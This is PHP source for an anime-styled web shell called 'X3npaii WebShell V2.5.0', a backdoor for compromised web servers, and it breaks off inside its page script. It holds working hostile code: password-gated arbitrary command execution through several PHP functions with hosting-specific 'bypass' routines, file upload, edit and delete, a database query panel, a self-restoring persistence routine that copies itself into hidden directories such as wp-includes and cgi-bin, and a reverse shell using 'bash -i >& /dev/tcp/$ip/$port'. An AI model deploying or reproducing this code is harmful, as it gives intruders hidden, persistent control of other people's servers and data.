<?php
// ==============================
// X3npaii WebShell V2.5.0 - Wibu Edition
// ==============================
error_reporting(0);
@set_time_limit(0);
date_default_timezone_set('Asia/Tokyo');

// Password Protection
$password = "x3zpass"; // Change this password
session_start();

// Track login attempts
if (!isset($_SESSION['attempts'])) {
    $_SESSION['attempts'] = 0;
}

// Security Bypass Detection
$is_litespeed = (strpos(@$_SERVER['SERVER_SOFTWARE'], 'LiteSpeed') !== false) ? "True" : "False";
$is_hostgator = (strpos(@$_SERVER['SERVER_NAME'], 'hostgator') !== false) ? "True" : "False";
$is_godaddy = (strpos(@$_SERVER['SERVER_NAME'], 'godaddy') !== false) ? "True" : "False";
$is_hostinger = (strpos(@$_SERVER['SERVER_NAME'], 'hostinger') !== false) ? "True" : "False";

// Bypass Techniques
function bypass_litespeed($cmd) {
    if (function_exists('proc_open')) {
        $descriptors = [
            0 => ['pipe', 'r'],
            1 => ['pipe', 'w'],
            2 => ['pipe', 'w']
        ];
        $process = @proc_open($cmd, $descriptors, $pipes);
        if (is_resource($process)) {
            $output = @stream_get_contents($pipes[1]);
            @fclose($pipes[0]);
            @fclose($pipes[1]);
            @fclose($pipes[2]);
            @proc_close($process);
            return $output;
        }
    }
    return false;
}
function bypass_hostgator($cmd) {
    if (function_exists('shell_exec')) {
        return @shell_exec($cmd);
    }
    return false;
}
function bypass_godaddy($cmd) {
    if (function_exists('popen')) {
        $handle = @popen($cmd . ' 2>&1', 'r');
        $output = '';
        while (!@feof($handle)) {
            $output .= @fread($handle, 1024);
        }
        @pclose($handle);
        return $output;
    }
    return false;
}
function bypass_hostinger($cmd) {
    if (function_exists('exec')) {
        @exec($cmd . ' 2>&1', $output);
        return @implode("\n", $output);
    }
    return false;
}

// Lock File
$lock_file = '.x3npaii.lock';
$current_file = @basename(__FILE__);

// Create lock if it doesn't exist
if (!@file_exists($lock_file)) {
    @file_put_contents($lock_file, 'LOCKED');
    @chmod($lock_file, 0444);
}

// Self-repair mechanism with enhanced stealth and auto mkdir
register_shutdown_function(function() use ($current_file, $lock_file) {
    if (!@file_exists($current_file)) {
        // Backup locations (auto create if not exists)
        $backup_locations = [
            dirname(__FILE__) . '/' . $current_file,
            dirname(__FILE__) . '/.htaccess.bak',
            dirname(__FILE__) . '/index.php.bak',
            dirname(__FILE__) . '/.well-known/' . $current_file,
            dirname(__FILE__) . '/wp-includes/' . $current_file,
            dirname(__FILE__) . '/cgi-bin/' . $current_file,
            dirname(__FILE__) . '/tmp/' . $current_file,
            dirname(__FILE__) . '/cache/' . $current_file
        ];

        // Auto-create parent dirs if not exist
        foreach ($backup_locations as $location) {
            $dir = dirname($location);
            if (!@is_dir($dir)) {
                @mkdir($dir, 0755, true); // Recursive mkdir
            }
        }

        // Get content from lock file to restore shell
        $content = @file_get_contents($lock_file);
        if ($content !== false) {
            foreach ($backup_locations as $location) {
                if (@file_put_contents($location, $content)) {
                    @chmod($location, 0555); // Read-only
                }
            }
        }
    }
});

// Password Protection Logic with enhanced security
if (!isset($_SESSION['loggedin'])) {
    if (isset($_POST['password'])) {
        if ($_POST['password'] == $password) {
            $_SESSION['loggedin'] = true;
            $_SESSION['attempts'] = 0;
            $_SESSION['ip'] = @$_SERVER['REMOTE_ADDR'];
            $_SESSION['user_agent'] = @$_SERVER['HTTP_USER_AGENT'];
        } else {
            $_SESSION['attempts']++;
            $error_msg = "";
            if ($_SESSION['attempts'] == 1) {
                $error_msg = "Password Wr0ng!! 2x Attempt left...";
            } elseif ($_SESSION['attempts'] >= 2) {
                $error_msg = "Bruh.. Idiot Senpaii!! Baka Baka... バカバカ...";
                @file_put_contents('.x3z_auth.log', date('Y-m-d H:i:s') . " - Failed login from " . @$_SERVER['REMOTE_ADDR'] . "\n", FILE_APPEND);
            }
            show_login_form($error_msg);
            exit;
        }
    } else {
        show_login_form();
        exit;
    }
}

// Session hijacking protection
if ($_SESSION['ip'] !== @$_SERVER['REMOTE_ADDR'] || $_SESSION['user_agent'] !== @$_SERVER['HTTP_USER_AGENT']) {
    session_destroy();
    header('Location: '.@basename(__FILE__));
    exit;
}

// ==============================
// MAIN SHELL FUNCTIONALITY
// ==============================

// Access Counter
$counter_file = '.x3z_counter';
$access_count = @file_exists($counter_file) ? (int)@file_get_contents($counter_file) : 0;
@file_put_contents($counter_file, ++$access_count);

// Current Directory
$current_dir = isset($_GET['path']) ? $_GET['path'] : @getcwd();
if (!@is_dir($current_dir)) $current_dir = @getcwd();
@chdir($current_dir);
$current_dir = str_replace('\\', '/', @realpath('.'));

// Messages
$message = '';

// Function: Success Message
function success_msg($text) {
    return "<div class='success-msg'>🌸 $text</div>";
}

// Function: Error Message
function error_msg($text) {
    return "<div class='error-msg'>💢 $text</div>";
}

// Function: Execute Command with Bypass
function execute_command($cmd) {
    global $is_litespeed, $is_hostgator, $is_godaddy, $is_hostinger;

    // Try bypass methods first based on detected environment
    if ($is_litespeed === "True") {
        $output = bypass_litespeed($cmd);
        if ($output !== false) return $output;
    }
    if ($is_hostgator === "True") {
        $output = bypass_hostgator($cmd);
        if ($output !== false) return $output;
    }
    if ($is_godaddy === "True") {
        $output = bypass_godaddy($cmd);
        if ($output !== false) return $output;
    }
    if ($is_hostinger === "True") {
        $output = bypass_hostinger($cmd);
        if ($output !== false) return $output;
    }

    // Fallback to standard methods
    $bypass_methods = [
        'system' => function($c) { @ob_start(); @system($c); return @ob_get_clean(); },
        'shell_exec' => function($c) { return @shell_exec($c); },
        'exec' => function($c) { @exec($c, $r); return @implode("\n", $r); },
        'popen' => function($c) { $h = @popen($c . ' 2>&1', 'r'); if (!$h) return ''; $o = ''; while (!@feof($h)) $o .= @fread($h, 1024); @pclose($h); return $o; },
        'passthru' => function($c) { @ob_start(); @passthru($c); return @ob_get_clean(); },
        'proc_open' => function($c) { $d = [['pipe', 'r'], ['pipe', 'w'], ['pipe', 'w']]; $p = @proc_open($c, $d, $io); if (!@is_resource($p)) return ''; $o = @stream_get_contents($io[1]); @proc_close($p); return $o; }
    ];

    foreach ($bypass_methods as $func => $method) {
        if (function_exists($func)) {
            try {
                $result = is_callable($method) ? $method($cmd) : $method($cmd);
                if (!empty($result)) return $result;
            } catch (Exception $e) {
                continue;
            }
        }
    }

    return 'ERROR: All execution functions are disabled.';
}

// Function: Format File Size
function format_size($bytes) {
    if ($bytes === 0) return "0 B";
    $k = 1024;
    $sizes = ["B", "KB", "MB", "GB", "TB"];
    $i = floor(log($bytes) / log($k));
    return round($bytes / pow($k, $i), 2) . " " . $sizes[$i];
}

// Extract Archive
if (isset($_GET['extract'])) {
    $file_path = $current_dir . '/' . $_GET['extract'];
    $file_ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION));
    $file_name = pathinfo($file_path, PATHINFO_FILENAME);
    $extract_dir = $current_dir . '/' . $file_name . '_extracted';
    if (!@is_dir($extract_dir)) @mkdir($extract_dir);
    if ($file_ext === 'zip') {
        $zip = new ZipArchive;
        if ($zip->open($file_path) === TRUE) {
            $zip->extractTo($extract_dir);
            $zip->close();
            $message .= success_msg("ZIP extracted to $extract_dir");
        } else {
            $message .= error_msg('Failed to extract ZIP');
        }
    } elseif ($file_ext === 'rar') {
        $output = execute_command('unrar x -o+ ' . escapeshellarg($file_path) . ' ' . escapeshellarg($extract_dir));
        if (strpos($output, 'ERROR') === false) {
            $message .= success_msg("RAR extracted to $extract_dir");
        } else {
            $message .= error_msg('Failed to extract RAR');
        }
    } elseif (strpos($file_path, '.tar') !== false) {
        $output = execute_command('tar -xf ' . escapeshellarg($file_path) . ' -C ' . escapeshellarg($extract_dir));
        if (empty($output)) {
            $message .= success_msg("TAR extracted to $extract_dir");
        } else {
            $message .= error_msg('Failed to extract TAR');
        }
    } else {
        $message .= error_msg('Unsupported archive format');
    }
}

// Execute Command
$cmd_output = '';
if (isset($_POST['exec'])) {
    $cmd_output = execute_command($_POST['exec']);
}

// File Upload
if (isset($_FILES['upload'])) {
    $target_path = $current_dir . '/' . $_FILES['upload']['name'];
    if (@move_uploaded_file($_FILES['upload']['tmp_name'], $target_path)) {
        $message .= success_msg("Uploaded file <b>{$_FILES['upload']['name']}</b> to <b>$current_dir</b>");
    } else {
        $message .= error_msg('Upload failed');
    }
}

// Create New File
if (isset($_POST['newfile']) && !empty($_POST['newfile'])) {
    if (@file_put_contents($current_dir . '/' . $_POST['newfile'], '//File Created By X3npaii WebShell V2.2.0')) {
        $message .= success_msg("File <b>{$_POST['newfile']}</b> created successfully");
    } else {
        $message .= error_msg("Failed to create file <b>{$_POST['newfile']}</b>");
    }
}

// Create New Directory
if (isset($_POST['newdir']) && !empty($_POST['newdir'])) {
    if (@mkdir($current_dir . '/' . $_POST['newdir'])) {
        $message .= success_msg("Directory <b>{$_POST['newdir']}</b> created successfully");
    } else {
        $message .= error_msg("Failed to create directory <b>{$_POST['newdir']}</b>");
    }
}

// Rename File/Directory
if (isset($_POST['rename']) && isset($_POST['rename_to']) && !empty($_POST['rename_to'])) {
    if (@rename($current_dir . '/' . $_POST['rename'], $current_dir . '/' . $_POST['rename_to'])) {
        $message .= success_msg("Renamed <b>{$_POST['rename']}</b> to <b>{$_POST['rename_to']}</b>");
    } else {
        $message .= error_msg("Failed to rename <b>{$_POST['rename']}</b>");
    }
}

// Change File Permissions
if (isset($_POST['chmod']) && isset($_POST['chmodfile'])) {
    if (@chmod($current_dir . '/' . $_POST['chmodfile'], octdec($_POST['chmod']))) {
        $message .= success_msg("Changed permissions of <b>{$_POST['chmodfile']}</b> to <b>{$_POST['chmod']}</b>");
    } else {
        $message .= error_msg("Failed to change permissions of <b>{$_POST['chmodfile']}</b>");
    }
}

// Delete Files/Directories
if (isset($_POST['delete'])) {
    $success = true;
    foreach ($_POST['sel'] as $item) {
        $target = $current_dir . '/' . $item;
        if (@is_dir($target)) {
            if (!@rmdir($target)) $success = false;
        } else {
            if (!@unlink($target)) $success = false;
        }
    }
    if ($success) {
        $message .= success_msg('Selected items deleted successfully');
    } else {
        $message .= error_msg('Failed to delete some items');
    }
}

// Move Files
if (isset($_POST['move']) && isset($_POST['target'])) {
    $success = true;
    foreach ($_POST['sel'] as $item) {
        if (!@rename($current_dir . '/' . $item, $_POST['target'] . '/' . $item)) {
            $success = false;
        }
    }
    if ($success) {
        $message .= success_msg("Moved to <b>{$_POST['target']}</b>");
    } else {
        $message .= error_msg("Failed to move some items to <b>{$_POST['target']}</b>");
    }
}

// Read File Contents
if (isset($_POST['readfile'])) {
    $target = $current_dir . '/' . $_POST['readfile'];
    if (@is_file($target)) {
        $content = htmlspecialchars(@file_get_contents($target));
        show_file_viewer($_POST['readfile'], $content, $current_dir);
        exit;
    }
}

// Edit File
if (isset($_GET['edit'])) {
    $file_path = $current_dir . '/' . $_GET['edit'];
    if (isset($_POST['save'])) {
        if (@file_put_contents($file_path, $_POST['content'])) {
            echo "<script>alert('Saved successfully!');window.location='?path=".urlencode($current_dir)."';</script>";
        } else {
            echo "<script>alert('Failed to save file!');</script>";
        }
    }
    $content = htmlspecialchars(@file_get_contents($file_path));
    show_file_editor(basename($file_path), $content, $current_dir);
    exit;
}

// Download File
if (isset($_GET['download'])) {
    $file_path = $current_dir . '/' . $_GET['download'];
    if (@file_exists($file_path)) {
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="'.@basename($file_path).'"');
        header('Content-Length: ' . @filesize($file_path));
        @readfile($file_path);
        exit;
    }
}

// Lock Shell Functionality
if (isset($_GET['lock'])) {
    if ($_GET['lock'] === 'enable') {
        // Create required directories if not exist
        $backup_dirs = [
            dirname(__FILE__) . '/.well-known/',
            dirname(__FILE__) . '/wp-includes/',
            dirname(__FILE__) . '/cgi-bin/',
            dirname(__FILE__) . '/tmp/',
            dirname(__FILE__) . '/cache/'
        ];
        foreach ($backup_dirs as $dir) {
            if (!@is_dir($dir)) {
                @mkdir($dir, 0755, true); // Recursive mkdir
            }
        }

        if (@file_put_contents($lock_file, 'LOCKED') && @chmod($lock_file, 0444)) {
            $message .= success_msg('Shell lock enabled! This shell will now self-repair if deleted.');
        } else {
            $message .= error_msg('Failed to enable shell lock!');
        }
    } elseif ($_GET['lock'] === 'disable') {
        if (@chmod($lock_file, 0644) && @unlink($lock_file)) {
            $message .= success_msg('Shell lock disabled!');
        } else {
            $message .= error_msg('Failed to disable shell lock!');
        }
    }
}

// Reverse Shell
if (isset($_POST['reverse_shell'])) {
    $ip = $_POST['ip'];
    $port = $_POST['port'];
    $cmd = "bash -i >& /dev/tcp/$ip/$port 0>&1";
    $output = execute_command($cmd);
    $message .= "<pre class='terminal-output'>".htmlspecialchars($output)."</pre>";
}

// Database Manager
if (isset($_POST['db_manager'])) {
    $host = $_POST['db_host'];
    $user = $_POST['db_user'];
    $pass = $_POST['db_pass'];
    $db = $_POST['db_name'];
    $conn = @mysqli_connect($host, $user, $pass, $db);
    if ($conn) {
        $query = $_POST['db_query'];
        $result = @mysqli_query($conn, $query);
        if ($result) {
            $message .= "<table class='db-table'>";
            while ($row = @mysqli_fetch_assoc($result)) {
                $message .= "<tr>";
                foreach ($row as $key => $value) {
                    $message .= "<td>".htmlspecialchars($value)."</td>";
                }
                $message .= "</tr>";
            }
            $message .= "</table>";
        } else {
            $message .= error_msg("Query failed: " . @mysqli_error($conn));
        }
        @mysqli_close($conn);
    } else {
        $message .= error_msg("Database connection failed: " . @mysqli_connect_error());
    }
}

// Terminal
if (isset($_POST['terminal'])) {
    $cmd = $_POST['terminal_cmd'];
    $output = execute_command($cmd);
    $message .= "<pre class='terminal-output'>".htmlspecialchars($output)."</pre>";
}

// Mass File Creation
if (isset($_POST['mass_create'])) {
    $filename = $_POST['mass_filename'];
    $note = $_POST['mass_note'];
    $dirs = array_filter(@scandir($current_dir), function ($item) use ($current_dir) {
        return @is_dir($current_dir . '/' . $item) && $item != '.' && $item != '..';
    });
    foreach ($dirs as $dir) {
        $filepath = $current_dir . '/' . $dir . '/' . $filename;
        if (@file_put_contents($filepath, "//File Created By X3npaii WebShell V2.2.0\n$note")) {
            $message .= success_msg("Created file <b>$filename</b> in <b>$dir</b>");
        } else {
            $message .= error_msg("Failed to create file <b>$filename</b> in <b>$dir</b>");
        }
    }
}

// Show login form
function show_login_form($error_msg = '') {
    echo '
    <!DOCTYPE html>
    <html>
    <head>
        <title>X3npaii WebShell V2.5.0 - Login</title>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <style>
            body {
                background: #1a1a2e url("https://64.media.tumblr.com/0e8f9a82511886517d441922e39c0e2c/c7e3fe76eb261d6e-77/s400x600/75b5a0286e5188997cf241101bef2c813e11a66e.gif ") no-repeat center center fixed;
                background-size: cover;
                font-family: "Segoe UI", "Meiryo", sans-serif;
                color: #fff;
                margin: 0;
                padding: 0;
                display: flex;
                justify-content: center;
                align-items: center;
                min-height: 100vh;
            }
            .login-box {
                background: rgba(26, 26, 46, 0.9);
                padding: 30px;
                border-radius: 15px;
                box-shadow: 0 0 20px rgba(255, 105, 180, 0.5);
                width: 90%;
                max-width: 350px;
                text-align: center;
                backdrop-filter: blur(5px);
                border: 1px solid #ff69b4;
                position: relative;
                overflow: hidden;
            }
            .login-box::before {
                content: "";
                position: absolute;
                top: 0;
                left: 0;
                right: 0;
                height: 3px;
                background: linear-gradient(90deg, #ff69b4, #ff1493, #9c27b0);
            }
            .login-box h1 {
                color: #ff69b4;
                margin-bottom: 20px;
                font-size: 24px;
                text-shadow: 0 0 5px rgba(255, 105, 180, 0.7);
            }
            .login-box h3 {
                color: #fff;
                margin-bottom: 20px;
                font-size: 18px;
            }
            .login-box input[type="password"] {
                width: 100%;
                padding: 12px;
                margin-bottom: 20px;
                border: 1px solid #ff69b4;
                border-radius: 8px;
                background: rgba(255, 255, 255, 0.1);
                color: #fff;
                font-size: 16px;
                box-sizing: border-box;
                transition: all 0.3s;
            }
            .login-box input[type="password"]:focus {
                outline: none;
                border-color: #ff1493;
                box-shadow: 0 0 0 2px rgba(255, 20, 147, 0.3);
            }
            .login-box button {
                width: 100%;
                padding: 12px;
                background: linear-gradient(135deg, #ff69b4, #ff1493);
                border: none;
                border-radius: 8px;
                color: white;
                font-size: 16px;
                cursor: pointer;
                transition: all 0.3s;
            }
            .login-box button:hover {
                background: linear-gradient(135deg, #ff1493, #ff69b4);
                box-shadow: 0 0 10px rgba(255, 105, 180, 0.7);
                transform: translateY(-2px);
            }
            .login-box button:active {
                transform: translateY(0);
            }
            .error {
                color: #ff4444;
                background: rgba(255, 0, 0, 0.1);
                padding: 10px;
                border-radius: 5px;
                margin-bottom: 20px;
                border-left: 4px solid #ff4444;
                display: flex;
                align-items: center;
            }
            .error::before {
                content: "✗";
                margin-right: 8px;
                font-weight: bold;
            }
            .anime-char {
                position: fixed;
                bottom: 20px;
                right: 20px;
                width: 120px;
                opacity: 0.8;
                z-index: -1;
                filter: drop-shadow(0 0 5px rgba(255, 105, 180, 0.7));
                animation: float 3s ease-in-out infinite;
            }
            @keyframes float {
                0%, 100% { transform: translateY(0); }
                50% { transform: translateY(-10px); }
            }
        </style>
    </head>
    <body>
        <div class="login-box">
            <h1>X3npaii WebShell V2.5.0</h1>
            <h3>Hi! Senpaii >_<</h3>
            '.(!empty($error_msg) ? '<div class="error">'.$error_msg.'</div>' : '').'
            <form method="POST">
                <input type="password" name="password" placeholder="Enter Password..." required/>
                <button type="submit">Login</button>
            </form>
        </div>
        <img src="https://i.imgur.com/5a4e8a8f7a5.png " class="anime-char" alt="Anime Character">
    </body>
    </html>';
}

// Show file viewer
function show_file_viewer($filename, $content, $current_dir) {
    echo '<!DOCTYPE html>
    <html>
    <head>
        <title>Viewing: '.htmlspecialchars($filename).'</title>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <style>
            body {
                background: #1a1a2e url("https://64.media.tumblr.com/0e8f9a82511886517d441922e39c0e2c/c7e3fe76eb261d6e-77/s400x600/75b5a0286e5188997cf241101bef2c813e11a66e.gif ") no-repeat center center fixed;
                background-size: cover;
                font-family: "Segoe UI", "Meiryo", sans-serif;
                color: #fff;
                padding: 20px;
            }
            h3 {
                color: #ff69b4;
                margin-bottom: 15px;
                text-shadow: 0 0 5px rgba(255, 105, 180, 0.7);
            }
            textarea {
                width: 100%;
                height: 70vh;
                background: rgba(26, 26, 46, 0.8);
                color: #fff;
                border: 1px solid #ff69b4;
                border-radius: 8px;
                padding: 15px;
                font-family: monospace;
                resize: none;
            }
            a {
                display: inline-block;
                margin-top: 15px;
                padding: 8px 15px;
                background: linear-gradient(135deg, #ff69b4, #ff1493);
                border-radius: 8px;
                color: white;
                text-decoration: none;
                transition: all 0.3s;
            }
            a:hover {
                background: linear-gradient(135deg, #ff1493, #ff69b4);
                box-shadow: 0 0 10px rgba(255, 105, 180, 0.7);
            }
        </style>
    </head>
    <body>
        <h3>Viewing: '.htmlspecialchars($filename).'</h3>
        <form>
            <textarea readonly>'.$content.'</textarea>
            <br>
            <a href="?path='.urlencode($current_dir).'">Back</a>
        </form>
    </body>
    </html>';
}

// Show file editor
function show_file_editor($filename, $content, $current_dir) {
    echo '<!DOCTYPE html>
    <html>
    <head>
        <title>Editing: '.htmlspecialchars($filename).'</title>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <style>
            body {
                background: #1a1a2e url("https://64.media.tumblr.com/0e8f9a82511886517d441922e39c0e2c/c7e3fe76eb261d6e-77/s400x600/75b5a0286e5188997cf241101bef2c813e11a66e.gif ") no-repeat center center fixed;
                background-size: cover;
                font-family: "Segoe UI", "Meiryo", sans-serif;
                color: #fff;
                padding: 20px;
            }
            h3 {
                color: #ff69b4;
                margin-bottom: 15px;
                text-shadow: 0 0 5px rgba(255, 105, 180, 0.7);
            }
            textarea {
                width: 100%;
                height: 70vh;
                background: rgba(26, 26, 46, 0.8);
                color: #fff;
                border: 1px solid #ff69b4;
                border-radius: 8px;
                padding: 15px;
                font-family: monospace;
            }
            input[type="submit"] {
                display: inline-block;
                margin-top: 15px;
                padding: 8px 15px;
                background: linear-gradient(135deg, #ff69b4, #ff1493);
                border: none;
                border-radius: 8px;
                color: white;
                cursor: pointer;
                transition: all 0.3s;
            }
            input[type="submit"]:hover {
                background: linear-gradient(135deg, #ff1493, #ff69b4);
                box-shadow: 0 0 10px rgba(255, 105, 180, 0.7);
            }
        </style>
    </head>
    <body>
        <h3>Edit: '.htmlspecialchars($filename).'</h3>
        <form method="POST">
            <textarea name="content">'.$content.'</textarea>
            <br>
            <input type="submit" name="save" value="Save">
        </form>
    </body>
    </html>';
}

// Show main shell interface
show_shell_interface($message, $cmd_output, $current_dir, $access_count, $is_litespeed, $is_hostgator, $is_godaddy, $is_hostinger);

function show_shell_interface($message, $cmd_output, $current_dir, $access_count, $is_litespeed, $is_hostgator, $is_godaddy, $is_hostinger) {
    echo '<!DOCTYPE html>
    <html>
    <head>
        <title>X3npaii WebShell V2.5.0</title>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
        <style>
            :root {
                --main-color: #ff69b4;
                --secondary-color: #ff1493;
                --bg-color: rgba(26, 26, 46, 0.85);
                --text-color: #fff;
                --accent-color: #9c27b0;
            }
            * {
                box-sizing: border-box;
                margin: 0;
                padding: 0;
                font-family: "Segoe UI", "Meiryo", "Hiragino Kaku Gothic Pro", sans-serif;
            }
            body {
                background: #1a1a2e url("https://64.media.tumblr.com/0e8f9a82511886517d441922e39c0e2c/c7e3fe76eb261d6e-77/s400x600/75b5a0286e5188997cf241101bef2c813e11a66e.gif ") no-repeat center center fixed;
                background-size: cover;
                color: var(--text-color);
                line-height: 1.6;
                padding: 0;
                margin: 0;
                min-height: 100vh;
                backdrop-filter: blur(2px);
                overflow-x: hidden;
            }
            .wrapper {
                display: flex;
                flex-direction: column;
                min-height: 100vh;
                padding: 15px;
            }
            .header {
                background: var(--bg-color);
                padding: 15px;
                border-radius: 15px;
                margin-bottom: 20px;
                box-shadow: 0 0 15px rgba(255, 105, 180, 0.5);
                border: 1px solid var(--main-color);
                backdrop-filter: blur(5px);
                position: relative;
                overflow: hidden;
            }
            .header::before {
                content: "";
                position: absolute;
                top: 0;
                left: 0;
                right: 0;
                height: 3px;
                background: linear-gradient(90deg, var(--main-color), var(--secondary-color), var(--accent-color));
            }
            .header h1 {
                color: var(--main-color);
                margin: 0 0 5px 0;
                font-size: 1.5rem;
                text-shadow: 0 0 5px rgba(255, 105, 180, 0.7);
                display: flex;
                align-items: center;
            }
            .header h1::before {
                content: "🌸";
                margin-right: 10px;
                font-size: 1.2em;
            }
            .header .info {
                font-size: 0.7rem;
                color: #aaa;
                display: flex;
                flex-wrap: wrap;
                gap: 10px;
            }
            .header .info span {
                background: rgba(0, 0, 0, 0.3);
                padding: 3px 6px;
                border-radius: 3px;
            }
            .message-container {
                margin-bottom: 15px;
            }
            .success-msg {
                color: #4caf50;
                background: rgba(76, 175, 80, 0.15);
                padding: 12px;
                border-radius: 8px;
                margin-bottom: 15px;
                border-left: 4px solid #4caf50;
                display: flex;
                align-items: center;
                backdrop-filter: blur(2px);
            }
            .success-msg::before {
                content: "✓";
                margin-right: 8px;
                font-weight: bold;
            }
            .error-msg {
                color: #f44336;
                background: rgba(244, 67, 54, 0.15);
                padding: 12px;
                border-radius: 8px;
                margin-bottom: 15px;
                border-left: 4px solid #f44336;
                display: flex;
                align-items: center;
                backdrop-filter: blur(2px);
            }
            .error-msg::before {
                content: "✗";
                margin-right: 8px;
                font-weight: bold;
            }
            .container {
                display: flex;
                flex-direction: column;
                gap: 20px;
                flex: 1;
            }
            .panel {
                background: var(--bg-color);
                border-radius: 15px;
                padding: 15px;
                box-shadow: 0 0 15px rgba(255, 105, 180, 0.3);
                border: 1px solid var(--main-color);
                backdrop-filter: blur(5px);
                position: relative;
                overflow: hidden;
            }
            .panel::before {
                content: "";
                position: absolute;
                top: 0;
                left: 0;
                right: 0;
                height: 3px;
                background: linear-gradient(90deg, var(--main-color), var(--secondary-color));
            }
            .panel h2 {
                color: var(--main-color);
                margin: 0 0 15px 0;
                font-size: 1.2rem;
                display: flex;
                align-items: center;
            }
            .panel h2::before {
                content: "✧";
                margin-right: 8px;
                font-size: 1em;
            }
            input[type="text"], 
            input[type="password"], 
            textarea, 
            select {
                width: 100%;
                padding: 12px;
                margin-bottom: 15px;
                border: 1px solid var(--main-color);
                border-radius: 8px;
                background: rgba(255, 255, 255, 0.1);
                color: var(--text-color);
                font-size: 0.9rem;
                transition: all 0.3s;
            }
            input[type="text"]:focus, 
            input[type="password"]:focus, 
            textarea:focus, 
            select:focus {
                outline: none;
                border-color: var(--secondary-color);
                box-shadow: 0 0 0 2px rgba(255, 20, 147, 0.3);
            }
            button, 
            input[type="submit"], 
            .button {
                background: linear-gradient(135deg, var(--main-color), var(--secondary-color));
                border: none;
                border-radius: 8px;
                color: white;
                padding: 12px 20px;
                cursor: pointer;
                transition: all 0.3s;
                font-size: 0.9rem;
                font-weight: 500;
                display: inline-flex;
                align-items: center;
                justify-content: center;
                text-decoration: none;
            }
            button:hover, 
            input[type="submit"]:hover, 
            .button:hover {
                background: linear-gradient(135deg, var(--secondary-color), var(--main-color));
                box-shadow: 0 0 15px rgba(255, 105, 180, 0.5);
                transform: translateY(-2px);
            }
            button:active, 
            input[type="submit"]:active, 
            .button:active {
                transform: translateY(0);
            }
            .file-list {
                width: 100%;
                border-collapse: separate;
                border-spacing: 0;
                margin-bottom: 15px;
                overflow-x: auto;
                display: block;
            }
            .file-list th {
                background: rgba(255, 105, 180, 0.3);
                padding: 12px;
                text-align: left;
                position: sticky;
                top: 0;
                backdrop-filter: blur(5px);
            }
            .file-list td {
                padding: 10px 12px;
                border-bottom: 1px solid rgba(255, 105, 180, 0.2);
            }
            .file-list tr:last-child td {
                border-bottom: none;
            }
            .file-list tr:hover {
                background: rgba(255, 105, 180, 0.1);
            }
            .file-list a {
                color: var(--main-color);
                text-decoration: none;
                transition: all 0.2s;
                display: inline-flex;
                align-items: center;
            }
            .file-list a:hover {
                color: var(--secondary-color);
                text-decoration: underline;
            }
            .file-list a::before {
                content: "→";
                margin-right: 5px;
                font-size: 0.8em;
            }
            .file-actions {
                display: flex;
                gap: 8px;
                flex-wrap: wrap;
            }
            .file-actions a {
                color: var(--text-color);
                background: rgba(255, 105, 180, 0.3);
                padding: 3px 8px;
                border-radius: 4px;
                font-size: 0.8rem;
                text-decoration: none;
                transition: all 0.2s;
            }
            .file-actions a:hover {
                background: rgba(255, 105, 180, 0.5);
                text-decoration: none;
            }
            .terminal-output {
                background: rgba(0, 0, 0, 0.7);
                color: #0f0;
                padding: 15px;
                border-radius: 8px;
                font-family: "Courier New", monospace;
                overflow-x: auto;
                margin-bottom: 15px;
                border: 1px solid rgba(0, 255, 0, 0.3);
                max-height: 300px;
                overflow-y: auto;
            }
            .tab-container {
                margin-bottom: 15px;
            }
            .tab-buttons {
                display: flex;
                border-bottom: 1px solid var(--main-color);
                overflow-x: auto;
                scrollbar-width: none;
            }
            .tab-buttons::-webkit-scrollbar {
                display: none;
            }
            .tab-button {
                padding: 10px 15px;
                background: rgba(26, 26, 46, 0.7);
                border: none;
                border-radius: 8px 8px 0 0;
                margin-right: 5px;
                cursor: pointer;
                color: var(--text-color);
                font-size: 0.9rem;
                white-space: nowrap;
                transition: all 0.2s;
                position: relative;
            }
            .tab-button::after {
                content: "";
                position: absolute;
                bottom: -1px;
                left: 0;
                right: 0;
                height: 2px;
                background: transparent;
                transition: all 0.2s;
            }
            .tab-button.active {
                background: rgba(255, 105, 180, 0.3);
                color: var(--main-color);
            }
            .tab-button.active::after {
                background: var(--main-color);
            }
            .tab-content {
                display: none;
                padding: 15px 0;
                animation: fadeIn 0.3s ease-in-out;
            }
            .tab-content.active {
                display: block;
            }
            .quick-commands {
                display: grid;
                grid-template-columns: repeat(auto-fill, minmax(120px, 1fr));
                gap: 10px;
                margin-bottom: 15px;
            }
            .quick-commands button {
                padding: 8px;
                font-size: 0.8rem;
            }
            .footer {
                text-align: center;
                margin-top: 20px;
                font-size: 0.7rem;
                color: #aaa;
                padding: 10px;
                background: var(--bg-color);
                border-radius: 8px;
                backdrop-filter: blur(5px);
            }
            .anime-char {
                position: fixed;
                bottom: 20px;
                right: 20px;
                width: 120px;
                opacity: 0.8;
                z-index: -1;
                filter: drop-shadow(0 0 5px rgba(255, 105, 180, 0.7));
                animation: float 3s ease-in-out infinite;
            }
            @keyframes float {
                0%, 100% { transform: translateY(0); }
                50% { transform: translateY(-10px); }
            }
            @keyframes fadeIn {
                from { opacity: 0; transform: translateY(10px); }
                to { opacity: 1; transform: translateY(0); }
            }
            /* Mobile optimizations */
            @media (max-width: 768px) {
                .wrapper {
                    padding: 10px;
                }
                .header h1 {
                    font-size: 1.3rem;
                }
                .panel {
                    padding: 12px;
                }
                .file-list td, .file-list th {
                    padding: 8px 10px;
                    font-size: 0.8rem;
                }
                .file-actions {
                    flex-direction: column;
                    gap: 4px;
                }
                .file-actions a {
                    padding: 2px 5px;
                    font-size: 0.7rem;
                }
                .quick-commands {
                    grid-template-columns: repeat(auto-fill, minmax(100px, 1fr));
                }
                .anime-char {
                    width: 80px;
                    bottom: 10px;
                    right: 10px;
                }
            }
            /* Custom scrollbar */
            ::-webkit-scrollbar {
                width: 8px;
                height: 8px;
            }
            ::-webkit-scrollbar-track {
                background: rgba(0, 0, 0, 0.2);
                border-radius: 10px;
            }
            ::-webkit-scrollbar-thumb {
                background: var(--main-color);
                border-radius: 10px;
            }
            ::-webkit-scrollbar-thumb:hover {
                background: var(--secondary-color);
            }
        </style>
        <script>
            function showTab(tabId) {
                document.querySelectorAll(".tab-content").forEach(tab => {
                    tab.classList.remove("active");
                });
